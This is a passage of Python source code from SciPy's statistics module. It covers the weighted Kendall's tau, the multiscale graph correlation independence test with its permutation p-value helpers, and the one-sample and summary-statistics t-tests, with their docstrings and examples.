parameters compute :math:`\tau_\mathrm h`: an exchange between
elements with rank :math:`r` and :math:`s` (starting from zero) has
weight :math:`1/(r+1) + 1/(s+1)`.
Specifying a rank array is meaningful only if you have in mind an
external criterion of importance. If, as is usually the case, you do
not have a specific ranking in mind, the weighted :math:`\tau` is
defined by averaging the values obtained using the decreasing
lexicographical rank by (`x`, `y`) and by (`y`, `x`). This is the
behavior with default parameters. Note that the convention used
here for ranking (lower values imply higher importance) is opposite
to that used by other SciPy statistical functions.
Parameters
----------
x, y : array_like
Arrays of scores, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
rank : array_like of ints or bool, optional
A nonnegative rank assigned to each element. If it is None, the
decreasing lexicographical rank by (`x`, `y`) will be used: elements of
higher rank will be those with larger `x`-values, using `y`-values to
break ties (in particular, swapping `x` and `y` will give a different
result). If it is False, the element indices will be used
directly as ranks. The default is True, in which case this
function returns the average of the values obtained using the
decreasing lexicographical rank by (`x`, `y`) and by (`y`, `x`).
weigher : callable, optional
The weigher function. Must map nonnegative integers (zero
representing the most important element) to a nonnegative weight.
The default, None, provides hyperbolic weighting, that is,
rank :math:`r` is mapped to weight :math:`1/(r+1)`.
additive : bool, optional
If True, the weight of an exchange is computed by adding the
weights of the ranks of the exchanged elements; otherwise, the weights
are multiplied. The default is True.
Returns
-------
correlation : float
The weighted :math:`\tau` correlation index.
pvalue : float
Presently ``np.nan``, as the null distribution of the statistic is unknown (even in the
additive hyperbolic case).
See Also
--------
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
Notes
-----
This function uses an :math:`O(n \log n)`, mergesort-based algorithm
[1]_ that is a weighted extension of Knight's algorithm for Kendall's
:math:`\tau` [2]_. It can compute Shieh's weighted :math:`\tau` [3]_
between rankings without ties (i.e., permutations) by setting
`additive` and `rank` to False, as the definition given in [1]_ is a
generalization of Shieh's.
NaNs are considered the smallest possible score.
.. versionadded:: 0.19.0
References
----------
.. [1] Sebastiano Vigna, "A weighted correlation index for rankings with
ties", Proceedings of the 24th international conference on World
Wide Web, pp. 1166-1176, ACM, 2015.
.. [2] W.R. Knight, "A Computer Method for Calculating Kendall's Tau with
Ungrouped Data", Journal of the American Statistical Association,
Vol. 61, No. 314, Part 1, pp. 436-439, 1966.
.. [3] Grace S. Shieh. "A weighted Kendall's tau statistic", Statistics &
Probability Letters, Vol. 39, No. 1, pp. 17-24, 1998.
Examples
--------
>>> from scipy import stats
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
>>> p_value
nan
>>> tau, p_value = stats.weightedtau(x, y, additive=False)
>>> tau
-0.62205716951801038
NaNs are considered the smallest possible score:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, np.nan]
>>> tau, _ = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
This is exactly Kendall's tau:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, _ = stats.weightedtau(x, y, weigher=lambda x: 1)
>>> tau
-0.47140452079103173
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> stats.weightedtau(x, y, rank=None)
WeightedTauResult(correlation=-0.4157652301037516, pvalue=nan)
>>> stats.weightedtau(y, x, rank=None)
WeightedTauResult(correlation=-0.7181341329699028, pvalue=nan)
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `weightedtau` must be "
"of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
if not x.size:
# Return NaN if arrays are empty
return WeightedTauResult(np.nan, np.nan)
# If there are NaNs we apply _toint64()
if np.isnan(np.sum(x)):
x = _toint64(x)
if np.isnan(np.sum(y)):
y = _toint64(y)
# Reduce unsupported dtypes to ranks
if x.dtype != y.dtype:
if x.dtype != np.int64:
x = _toint64(x)
if y.dtype != np.int64:
y = _toint64(y)
else:
if x.dtype not in (np.int32, np.int64, np.float32, np.float64):
x = _toint64(x)
y = _toint64(y)
if rank is True:
return WeightedTauResult((
_weightedrankedtau(x, y, None, weigher, additive) +
_weightedrankedtau(y, x, None, weigher, additive)
) / 2, np.nan)
if rank is False:
rank = np.arange(x.size, dtype=np.intp)
elif rank is not None:
rank = np.asarray(rank).ravel()
if rank.size != x.size:
raise ValueError(
"All inputs to `weightedtau` must be of the same size, "
"found x-size %s and rank-size %s" % (x.size, rank.size)
)
return WeightedTauResult(_weightedrankedtau(x, y, rank, weigher, additive),
np.nan)
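# Illustrative sketch of the default weighting described in the docstring
# above; `_hyperbolic_weigher` and `_exchange_weight` are hypothetical names,
# not part of the public API.
def _hyperbolic_weigher(r):
    # rank 0 is the most important element; weight decays as 1 / (r + 1)
    return 1. / (r + 1)

def _exchange_weight(r, s, additive=True, weigher=_hyperbolic_weigher):
    # weight of an exchange between the elements of rank `r` and rank `s`:
    # the sum (additive=True) or the product (additive=False) of their weights
    wr, ws = weigher(r), weigher(s)
    return wr + ws if additive else wr * ws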
# FROM MGCPY: https://github.com/neurodata/mgcpy
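# A callable class (rather than a closure) is used here so that the
# permutation worker can be pickled when `workers` dispatches it through
# multiprocessing.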
class _ParallelP:
"""Helper function to calculate parallel p-value."""
def __init__(self, x, y, random_states):
self.x = x
self.y = y
self.random_states = random_states
def __call__(self, index):
order = self.random_states[index].permutation(self.y.shape[0])
permy = self.y[order][:, order]
# calculate permuted stats, store in null distribution
perm_stat = _mgc_stat(self.x, permy)[0]
return perm_stat
def _perm_test(x, y, stat, reps=1000, workers=-1, random_state=None):
r"""Helper function that calculates the p-value. See below for uses.
Parameters
----------
x, y : ndarray
`x` and `y` have shapes `(n, p)` and `(n, q)`.
stat : float
The sample test statistic.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is 1000 replications.
workers : int or map-like callable, optional
If `workers` is an int the population is subdivided into `workers`
sections and evaluated in parallel (uses
`multiprocessing.Pool <multiprocessing>`). Supply `-1` to use all cores
available to the Process. Alternatively supply a map-like callable,
such as `multiprocessing.Pool.map` for evaluating the population in
parallel. This evaluation is carried out as `workers(func, iterable)`.
Requires that `func` be pickleable.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
If `seed` is None (or `np.random`), the `numpy.random.RandomState`
singleton is used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` or ``RandomState`` instance then
that instance is used.
Returns
-------
pvalue : float
The sample test p-value.
null_dist : list
The approximated null distribution.
"""
# generate seeds for each rep (change to new parallel random number
# capabilities in numpy >= 1.17+)
random_state = check_random_state(random_state)
random_states = [np.random.RandomState(rng_integers(random_state, 1 << 32,
size=4, dtype=np.uint32)) for _ in range(reps)]
# parallelizes with specified workers over number of reps and set seeds
parallelp = _ParallelP(x=x, y=y, random_states=random_states)
with MapWrapper(workers) as mapwrapper:
null_dist = np.array(list(mapwrapper(parallelp, range(reps))))
# calculate p-value and significant permutation map through list
pvalue = (null_dist >= stat).sum() / reps
# correct a p-value of exactly 0: with a finite number of random
# permutations, the smallest p-value that can be resolved is 1 / reps
if pvalue == 0:
pvalue = 1 / reps
return pvalue, null_dist
def _euclidean_dist(x):
return cdist(x, x)
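# A hedged usage sketch: any callable of the form ``compute_distance(x)`` that
# returns an ``(n, n)`` matrix can be passed to `multiscale_graphcorr`. The
# helper below is hypothetical (not part of the public API) and simply swaps
# the metric used by `_euclidean_dist` above.
def _cityblock_dist(x):
    # pairwise city-block (L1) distances among the rows of `x`
    return cdist(x, x, metric='cityblock')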
MGCResult = namedtuple('MGCResult', ('stat', 'pvalue', 'mgc_dict'))
def multiscale_graphcorr(x, y, compute_distance=_euclidean_dist, reps=1000,
workers=1, is_twosamp=False, random_state=None):
r"""Computes the Multiscale Graph Correlation (MGC) test statistic.
Specifically, for each point, MGC finds the :math:`k`-nearest neighbors for
one property (e.g. cloud density), and the :math:`l`-nearest neighbors for
the other property (e.g. grass wetness) [1]_. This pair :math:`(k, l)` is
called the "scale". A priori, however, it is not known which scales will be
most informative. So, MGC computes all distance pairs, and then efficiently
computes the distance correlations for all scales. The local correlations
illustrate which scales are relatively informative about the relationship.
The key, therefore, to successfully discover and decipher relationships
between disparate data modalities is to adaptively determine which scales
are the most informative, and the geometric implication for the most
informative scales. Doing so not only provides an estimate of whether the
modalities are related, but also provides insight into how the
determination was made. This is especially important in high-dimensional
data, where simple visualizations do not reveal relationships to the
unaided human eye. Characterizations of this implementation in particular
have been derived from and benchmarked within [2]_.
Parameters
----------
x, y : ndarray
If ``x`` and ``y`` have shapes ``(n, p)`` and ``(n, q)`` where `n` is
the number of samples and `p` and `q` are the number of dimensions,
then the MGC independence test will be run. Alternatively, ``x`` and
``y`` can have shapes ``(n, n)`` if they are distance or similarity
matrices, and ``compute_distance`` must be set to ``None``. If ``x``
and ``y`` have shapes ``(n, p)`` and ``(m, p)``, an unpaired
two-sample MGC test will be run.
compute_distance : callable, optional
A function that computes the distance or similarity among the samples
within each data matrix. Set to ``None`` if ``x`` and ``y`` are
already distance matrices. The default uses the euclidean norm metric.
If you are calling a custom function, either create the distance
matrix before-hand or create a function of the form
``compute_distance(x)`` where `x` is the data matrix for which
pairwise distances are calculated.
reps : int, optional
The number of replications used to estimate the null when using the
permutation test. The default is ``1000``.
workers : int or map-like callable, optional
If ``workers`` is an int the population is subdivided into ``workers``
sections and evaluated in parallel (uses ``multiprocessing.Pool
<multiprocessing>``). Supply ``-1`` to use all cores available to the
Process. Alternatively supply a map-like callable, such as
``multiprocessing.Pool.map`` for evaluating the p-value in parallel.
This evaluation is carried out as ``workers(func, iterable)``.
Requires that `func` be pickleable. The default is ``1``.
is_twosamp : bool, optional
If `True`, a two sample test will be run. If ``x`` and ``y`` have
shapes ``(n, p)`` and ``(m, p)``, this option will be overridden and
set to ``True``. Set to ``True`` if ``x`` and ``y`` both have shapes
``(n, p)`` and a two sample test is desired. The default is ``False``.
Note that this will not run if inputs are distance matrices.
random_state : {None, int, `numpy.random.Generator`,
`numpy.random.RandomState`}, optional
If `seed` is None (or `np.random`), the `numpy.random.RandomState`
singleton is used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``Generator`` or ``RandomState`` instance then
that instance is used.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
pvalue : float
The p-value obtained via permutation.
mgc_dict : dict
Contains additional useful returns with the following keys:
- mgc_map : ndarray
A 2D representation of the latent geometry of the relationship.
- opt_scale : (int, int)
The estimated optimal scale as a `(x, y)` pair.
- null_dist : list
The null distribution derived from the permuted matrices.
See Also
--------
pearsonr : Pearson correlation coefficient and p-value for testing
non-correlation.
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
Notes
-----
A description of the process of MGC and applications on neuroscience data
can be found in [1]_. It is performed using the following steps:
#. Two distance matrices :math:`D^X` and :math:`D^Y` are computed and
modified to be mean zero columnwise. This results in two
:math:`n \times n` distance matrices :math:`A` and :math:`B` (the
centering and unbiased modification) [3]_.
#. For all values :math:`k` and :math:`l` from :math:`1, ..., n`,
* The :math:`k`-nearest neighbor and :math:`l`-nearest neighbor graphs
are calculated for each property. Here, :math:`G_k (i, j)` indicates
the :math:`k`-smallest values of the :math:`i`-th row of :math:`A`
and :math:`H_l (i, j)` indicates the :math:`l`-smallest values of
the :math:`i`-th row of :math:`B`.
* Let :math:`\circ` denote the entry-wise matrix product, then local
correlations are summed and normalized using the following statistic:
.. math::
c^{kl} = \frac{\sum_{ij} A G_k B H_l}
{\sqrt{\sum_{ij} A^2 G_k \times \sum_{ij} B^2 H_l}}
#. The MGC test statistic is the smoothed optimal local correlation of
:math:`\{ c^{kl} \}`. Denote the smoothing operation as :math:`R(\cdot)`
(which essentially sets all isolated large correlations to 0 and leaves
connected large correlations unchanged, see [3]_). MGC is,
.. math::
MGC_n (x, y) = \max_{(k, l)} R \left(c^{kl} \left( x_n, y_n \right)
\right)
The test statistic returns a value between :math:`(-1, 1)` since it is
normalized.
The p-value returned is calculated using a permutation test. This process
is completed by first randomly permuting :math:`y` to estimate the null
distribution and then calculating the probability of observing a test
statistic, under the null, at least as extreme as the observed test
statistic.
MGC requires at least 5 samples to run with reliable results. It can also
handle high-dimensional data sets.
In addition, by manipulating the input data matrices, the two-sample
testing problem can be reduced to the independence testing problem [4]_.
Given sample data :math:`U` and :math:`V` of sizes :math:`p \times n` and
:math:`p \times m`, data matrices :math:`X` and :math:`Y` can be created as
follows:
.. math::
X = [U | V] \in \mathcal{R}^{p \times (n + m)}
Y = [0_{1 \times n} | 1_{1 \times m}] \in \mathcal{R}^{(n + m)}
Then, the MGC statistic can be calculated as normal. This methodology can
be extended to similar tests such as distance correlation [4]_.
.. versionadded:: 1.4.0
References
----------
.. [1] Vogelstein, J. T., Bridgeford, E. W., Wang, Q., Priebe, C. E.,
Maggioni, M., & Shen, C. (2019). Discovering and deciphering
relationships across disparate data modalities. ELife.
.. [2] Panda, S., Palaniappan, S., Xiong, J., Swaminathan, A.,
Ramachandran, S., Bridgeford, E. W., ... Vogelstein, J. T. (2019).
mgcpy: A Comprehensive High Dimensional Independence Testing Python
Package. :arXiv:`1907.02088`
.. [3] Shen, C., Priebe, C.E., & Vogelstein, J. T. (2019). From distance
correlation to multiscale graph correlation. Journal of the American
Statistical Association.
.. [4] Shen, C. & Vogelstein, J. T. (2018). The Exact Equivalence of
Distance and Kernel Methods for Hypothesis Testing.
:arXiv:`1806.05514`
Examples
--------
>>> from scipy.stats import multiscale_graphcorr
>>> x = np.arange(100)
>>> y = x
>>> stat, pvalue, _ = multiscale_graphcorr(x, y, workers=-1)
>>> '%.1f, %.3f' % (stat, pvalue)
'1.0, 0.001'
Alternatively,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y)
>>> '%.1f, %.3f' % (mgc.stat, mgc.pvalue)
'1.0, 0.001'
To run an unpaired two-sample test,
>>> x = np.arange(100)
>>> y = np.arange(79)
>>> mgc = multiscale_graphcorr(x, y)
>>> '%.3f, %.2f' % (mgc.stat, mgc.pvalue) # doctest: +SKIP
'0.033, 0.02'
or, if shape of the inputs are the same,
>>> x = np.arange(100)
>>> y = x
>>> mgc = multiscale_graphcorr(x, y, is_twosamp=True)
>>> '%.3f, %.1f' % (mgc.stat, mgc.pvalue) # doctest: +SKIP
'-0.008, 1.0'
"""
if not isinstance(x, np.ndarray) or not isinstance(y, np.ndarray):
raise ValueError("x and y must be ndarrays")
# convert arrays of type (n,) to (n, 1)
if x.ndim == 1:
x = x[:, np.newaxis]
elif x.ndim != 2:
raise ValueError("Expected a 2-D array `x`, found shape "
"{}".format(x.shape))
if y.ndim == 1:
y = y[:, np.newaxis]
elif y.ndim != 2:
raise ValueError("Expected a 2-D array `y`, found shape "
"{}".format(y.shape))
nx, px = x.shape
ny, py = y.shape
# check for NaNs
_contains_nan(x, nan_policy='raise')
_contains_nan(y, nan_policy='raise')
# check for positive or negative infinity and raise error
if np.sum(np.isinf(x)) > 0 or np.sum(np.isinf(y)) > 0:
raise ValueError("Inputs contain infinities")
if nx != ny:
if px == py:
# reshape x and y for two sample testing
is_twosamp = True
else:
raise ValueError("Shape mismatch, x and y must have shape [n, p] "
"and [n, q] or have shape [n, p] and [m, p].")
if nx < 5 or ny < 5:
raise ValueError("MGC requires at least 5 samples to give reasonable "
"results.")
# convert x and y to float
x = x.astype(np.float64)
y = y.astype(np.float64)
# check that `compute_distance` is a callable (or None)
if not callable(compute_distance) and compute_distance is not None:
raise ValueError("Compute_distance must be a function.")
# check that the number of reps is a non-negative integer (a warning is
# raised if it is under 1000)
if not isinstance(reps, int) or reps < 0:
raise ValueError("Number of reps must be an integer greater than 0.")
elif reps < 1000:
msg = ("The number of replications is low (under 1000), and p-value "
"calculations may be unreliable. Use the p-value result, with "
"caution!")
warnings.warn(msg, RuntimeWarning)
if is_twosamp:
if compute_distance is None:
raise ValueError("Cannot run if inputs are distance matrices")
x, y = _two_sample_transform(x, y)
if compute_distance is not None:
# compute distance matrices for x and y
x = compute_distance(x)
y = compute_distance(y)
# calculate MGC stat
stat, stat_dict = _mgc_stat(x, y)
stat_mgc_map = stat_dict["stat_mgc_map"]
opt_scale = stat_dict["opt_scale"]
# calculate permutation MGC p-value
pvalue, null_dist = _perm_test(x, y, stat, reps=reps, workers=workers,
random_state=random_state)
# save all stats (other than stat/p-value) in dictionary
mgc_dict = {"mgc_map": stat_mgc_map,
"opt_scale": opt_scale,
"null_dist": null_dist}
return MGCResult(stat, pvalue, mgc_dict)
def _mgc_stat(distx, disty):
r"""Helper function that calculates the MGC stat. See above for use.
Parameters
----------
distx, disty : ndarray
`distx` and `disty` have shapes `(n, p)` and `(n, q)` or
`(n, n)` and `(n, n)`
if distance matrices.
Returns
-------
stat : float
The sample MGC test statistic within `[-1, 1]`.
stat_dict : dict
Contains additional useful returns with the following keys:
- stat_mgc_map : ndarray
MGC-map of the statistics.
- opt_scale : (float, float)
The estimated optimal scale as a `(x, y)` pair.
"""
# calculate MGC map and optimal scale
stat_mgc_map = _local_correlations(distx, disty, global_corr='mgc')
n, m = stat_mgc_map.shape
if m == 1 or n == 1:
# the global scale is the statistic calculated at the maximal nearest
# neighbors. There is not enough local scale to search over, so
# default to global scale
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = m * n
else:
samp_size = len(distx) - 1
# threshold to find connected region of significant local correlations
sig_connect = _threshold_mgc_map(stat_mgc_map, samp_size)
# maximum within the significant region
stat, opt_scale = _smooth_mgc_map(sig_connect, stat_mgc_map)
stat_dict = {"stat_mgc_map": stat_mgc_map,
"opt_scale": opt_scale}
return stat, stat_dict
def _threshold_mgc_map(stat_mgc_map, samp_size):
r"""
Finds a connected region of significance in the MGC-map by thresholding.
Parameters
----------
stat_mgc_map : ndarray
All local correlations within `[-1,1]`.
samp_size : int
The sample size of original data.
Returns
-------
sig_connect : ndarray
A binary matrix with 1's indicating the significant region.
"""
m, n = stat_mgc_map.shape
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance. Threshold is based on a beta
# approximation.
per_sig = 1 - (0.02 / samp_size) # Percentile to consider as significant
threshold = samp_size * (samp_size - 3)/4 - 1/2 # Beta approximation
threshold = distributions.beta.ppf(per_sig, threshold, threshold) * 2 - 1
# the global scale is the statistic calculated at the maximal nearest
# neighbors. Threshold is the maximum on the global and local scales
threshold = max(threshold, stat_mgc_map[m - 1][n - 1])
# find the largest connected component of significant correlations
sig_connect = stat_mgc_map > threshold
if np.sum(sig_connect) > 0:
sig_connect, _ = _measurements.label(sig_connect)
_, label_counts = np.unique(sig_connect, return_counts=True)
# skip the first element in label_counts, as it is count(zeros)
max_label = np.argmax(label_counts[1:]) + 1
sig_connect = sig_connect == max_label
else:
sig_connect = np.array([[False]])
return sig_connect
def _smooth_mgc_map(sig_connect, stat_mgc_map):
"""Finds the smoothed maximal within the significant region R.
If area of R is too small it returns the last local correlation. Otherwise,
returns the maximum within significant_connected_region.
Parameters
----------
sig_connect : ndarray
A binary matrix with 1's indicating the significant region.
stat_mgc_map : ndarray
All local correlations within `[-1, 1]`.
Returns
-------
stat : float
The sample MGC statistic within `[-1, 1]`.
opt_scale: (float, float)
The estimated optimal scale as an `(x, y)` pair.
"""
m, n = stat_mgc_map.shape
# the global scale is the statistic calculated at the maximal nearest
# neighbors. By default, statistic and optimal scale are global.
stat = stat_mgc_map[m - 1][n - 1]
opt_scale = [m, n]
if np.linalg.norm(sig_connect) != 0:
# proceed only when the connected region's area is sufficiently large
# 0.02 is simply an empirical threshold, this can be set to 0.01 or 0.05
# with varying levels of performance
if np.sum(sig_connect) >= np.ceil(0.02 * max(m, n)) * min(m, n):
max_corr = max(stat_mgc_map[sig_connect])
# find all scales within significant_connected_region that maximize
# the local correlation
max_corr_index = np.where((stat_mgc_map >= max_corr) & sig_connect)
if max_corr >= stat:
stat = max_corr
k, l = max_corr_index
one_d_indices = k * n + l # 2D to 1D indexing
k = np.max(one_d_indices) // n
l = np.max(one_d_indices) % n
opt_scale = [k+1, l+1] # adding 1s to match R indexing
return stat, opt_scale
def _two_sample_transform(u, v):
"""Helper function that concatenates x and y for two sample MGC stat.
See above for use.
Parameters
----------
u, v : ndarray
`u` and `v` have shapes `(n, p)` and `(m, p)`.
Returns
-------
x : ndarray
Concatenation of `u` and `v` along ``axis=0``. `x` thus has shape
`(n+m, p)`.
y : ndarray
Label matrix for `x` where 0 refers to samples that come from `u` and
1 refers to samples that come from `v`. `y` thus has shape `(n+m, 1)`.
"""
nx = u.shape[0]
ny = v.shape[0]
x = np.concatenate([u, v], axis=0)
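# the label vector below is Y = [0_{1 x n} | 1_{1 x m}]^T from the two-sample
# reduction described in the `multiscale_graphcorr` Notes: zeros mark rows of
# `x` that came from `u`, ones mark rows that came from `v`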
y = np.concatenate([np.zeros(nx), np.ones(ny)], axis=0).reshape(-1, 1)
return x, y
#####################################
# INFERENTIAL STATISTICS #
#####################################
Ttest_1sampResult = namedtuple('Ttest_1sampResult', ('statistic', 'pvalue'))
def ttest_1samp(a, popmean, axis=0, nan_policy='propagate',
alternative="two-sided"):
"""Calculate the T-test for the mean of ONE group of scores.
This is a test for the null hypothesis that the expected value
(mean) of a sample of independent observations `a` is equal to the given
population mean, `popmean`.
Parameters
----------
a : array_like
Sample observation.
popmean : float or array_like
Expected value in null hypothesis. If array_like, then it must have the
same shape as `a` excluding the axis dimension.
axis : int or None, optional
Axis along which to compute test; default is 0. If None, compute over
the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the mean of the underlying distribution of the sample
is different than the given population mean (`popmean`)
* 'less': the mean of the underlying distribution of the sample is
less than the given population mean (`popmean`)
* 'greater': the mean of the underlying distribution of the sample is
greater than the given population mean (`popmean`)
.. versionadded:: 1.6.0
Returns
-------
statistic : float or array
t-statistic.
pvalue : float or array
Two-sided p-value.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> rvs = stats.norm.rvs(loc=5, scale=10, size=(50, 2), random_state=rng)
Test if mean of random sample is equal to true mean, and different mean.
We reject the null hypothesis in the second case and don't reject it in
the first case.
>>> stats.ttest_1samp(rvs, 5.0)
Ttest_1sampResult(statistic=array([-2.09794637, -1.75977004]), pvalue=array([0.04108952, 0.08468867]))
>>> stats.ttest_1samp(rvs, 0.0)
Ttest_1sampResult(statistic=array([1.64495065, 1.62095307]), pvalue=array([0.10638103, 0.11144602]))
Examples using axis and non-scalar dimension for population mean.
>>> result = stats.ttest_1samp(rvs, [5.0, 0.0])
>>> result.statistic
array([-2.09794637, 1.62095307])
>>> result.pvalue
array([0.04108952, 0.11144602])
>>> result = stats.ttest_1samp(rvs.T, [5.0, 0.0], axis=1)
>>> result.statistic
array([-2.09794637, 1.62095307])
>>> result.pvalue
array([0.04108952, 0.11144602])
>>> result = stats.ttest_1samp(rvs, [[5.0], [0.0]])
>>> result.statistic
array([[-2.09794637, -1.75977004],
[ 1.64495065, 1.62095307]])
>>> result.pvalue
array([[0.04108952, 0.08468867],
[0.10638103, 0.11144602]])
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.ttest_1samp(a, popmean, axis, alternative)
n = a.shape[axis]
df = n - 1
d = np.mean(a, axis) - popmean
v = np.var(a, axis, ddof=1)
denom = np.sqrt(v / n)
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t, alternative)
return Ttest_1sampResult(t, prob)
def _ttest_finish(df, t, alternative):
"""Common code between all 3 t-test functions."""
# We use ``stdtr`` directly here as it handles the case when ``nan``
# values are present in the data and masked arrays are passed
# while ``t.cdf`` emits runtime warnings. This way ``_ttest_finish``
# can be shared between the ``stats`` and ``mstats`` versions.
if alternative == 'less':
pval = special.stdtr(df, t)
elif alternative == 'greater':
pval = special.stdtr(df, -t)
elif alternative == 'two-sided':
pval = special.stdtr(df, -np.abs(t))*2
else:
raise ValueError("alternative must be "
"'less', 'greater' or 'two-sided'")
if t.ndim == 0:
t = t[()]
if pval.ndim == 0:
pval = pval[()]
return t, pval
def _ttest_ind_from_stats(mean1, mean2, denom, df, alternative):
d = mean1 - mean2
with np.errstate(divide='ignore', invalid='ignore'):
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t, alternative)
return (t, prob)
def _unequal_var_ttest_denom(v1, n1, v2, n2):
vn1 = v1 / n1
vn2 = v2 / n2
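# The df expression below is the Welch-Satterthwaite approximation to the
# effective degrees of freedom for the unequal-variance (Welch's) t-test.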
with np.errstate(divide='ignore', invalid='ignore'):
df = (vn1 + vn2)**2 / (vn1**2 / (n1 - 1) + vn2**2 / (n2 - 1))
# If df is undefined, variances are zero (assumes n1 > 0 & n2 > 0).
# Hence it doesn't matter what df is as long as it's not NaN.
df = np.where(np.isnan(df), 1, df)
denom = np.sqrt(vn1 + vn2)
return df, denom
def _equal_var_ttest_denom(v1, n1, v2, n2):
df = n1 + n2 - 2.0
svar = ((n1 - 1) * v1 + (n2 - 1) * v2) / df
denom = np.sqrt(svar * (1.0 / n1 + 1.0 / n2))
return df, denom
Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
def ttest_ind_from_stats(mean1, std1, nobs1, mean2, std2, nobs2,
equal_var=True, alternative="two-sided"):
r"""
T-test for means of two independent samples from descriptive statistics.
This is a test for the null hypothesis that two independent
samples have identical average (expected) values.
Parameters
----------
mean1 : array_like
The mean(s) of sample 1.
std1 : array_like
The standard deviation(s) of sample 1.
nobs1 : array_like
The number(s) of observations of sample 1.
mean2 : array_like
The mean(s) of sample 2.
std2 : array_like
The standard deviations(s) of sample 2.
nobs2 : array_like
The number(s) of observations of sample 2.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the means of the distributions are unequal.
* 'less': the mean of the first distribution is less than the
mean of the second distribution.
* 'greater': the mean of the first distribution is greater than the
mean of the second distribution.
.. versionadded:: 1.6.0
Returns
-------
statistic : float or array
The calculated t-statistics.
pvalue : float or array
The two-tailed p-value.
See Also
--------
scipy.stats.ttest_ind
Notes
-----
.. versionadded:: 0.16.0
References
----------
.. [1] https://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] https://en.wikipedia.org/wiki/Welch%27s_t-test
Examples
--------
Suppose we have the summary data for two samples, as follows::
                    Sample   Sample
              Size   Mean   Variance
   Sample 1    13    15.0     87.5
   Sample 2    11    12.0     39.0
Apply the t-test to this data (with the assumption that the population
variances are equal):
>>> from scipy.stats import ttest_ind_from_stats
>>> ttest_ind_from_stats(mean1=15.0, std1=np.sqrt(87.5), nobs1=13,
... mean2=12.0, std2=np.sqrt(39.0), nobs2=11)
Ttest_indResult(statistic=0.9051358093310269, pvalue=0.3751996797581487)
For comparison, here is the data from which those summary statistics
were taken. With this data, we can compute the same result using
`scipy.stats.ttest_ind`:
>>> a = np.array([1, 3, 4, 6, 11, 13, 15, 19, 22, 24, 25, 26, 26])
>>> b = np.array([2, 4, 6, 9, 11, 13, 14, 15, 18, 19, 21])
>>> from scipy.stats import ttest_ind
>>> ttest_ind(a, b)
Ttest_indResult(statistic=0.905135809331027, pvalue=0.3751996797581486)
Suppose we instead have binary data and would like to apply a t-test to
compare the proportion of 1s in two independent groups::
                      Number of    Sample     Sample
                Size    ones       Mean       Variance
   Sample 1      150      30       0.2        0.16
   Sample 2      200      45       0.225      0.174375
The sample mean :math:`\hat{p}` is the proportion of ones in the sample
and the variance for a binary observation is estimated by
:math:`\hat{p}(1-\hat{p})`.
>>> ttest_ind_from_stats(mean1=0.2, std1=np.sqrt(0.16), nobs1=150,
... mean2=0.225, std2=np.sqrt(0.17437), nobs2=200)
Ttest_indResult(statistic=-0.564327545549774, pvalue=0.5728947691244874)
For comparison, we could compute the t statistic and p-value using
arrays of 0s and 1s and `scipy.stat.ttest_ind`, as above.
>>> group1 = np.array([1]*30 + [0]*(150-30))
>>> group2 = np.array([1]*45 + [0]*(200-45))
>>> ttest_ind(group1, group2)
Ttest_indResult(statistic=-0.5627179589855622, pvalue=0.573989277115258)
"""
mean1 = np.asarray(mean1)
std1 = np.asarray(std1)
mean2 = np.asarray(mean2)
std2 = np.asarray(std2)
if equal_var:
df, denom = _equal_var_ttest_denom(std1**2, nobs1, std2**2, nobs2)
else:
df, denom = _unequal_var_ttest_denom(std1**2, nobs1,
std2**2, nobs2)
res = _ttest_ind_from_stats(mean1, mean2, denom, df, alternative)
return Ttest_indResult(*res)
def _ttest_nans(a, b, axis, namedtuple_type):
"""
Generate an array of `nan`, with shape determined by `a`, `b` and `axis`.
This function is used by ttest_ind and ttest_rel to create the return
value when one of the inputs has size 0.
The shapes of the arrays are determined by dropping `axis` from the
shapes of `a` and `b` and broadcasting what is left.
The return value is a named tuple of the type given in `namedtuple_type`.
Examples
--------
>>> a = np.zeros((9, 2))
>>> b = np.zeros((5, 1))
>>> _ttest_nans(a, b, 0, Ttest_indResult)
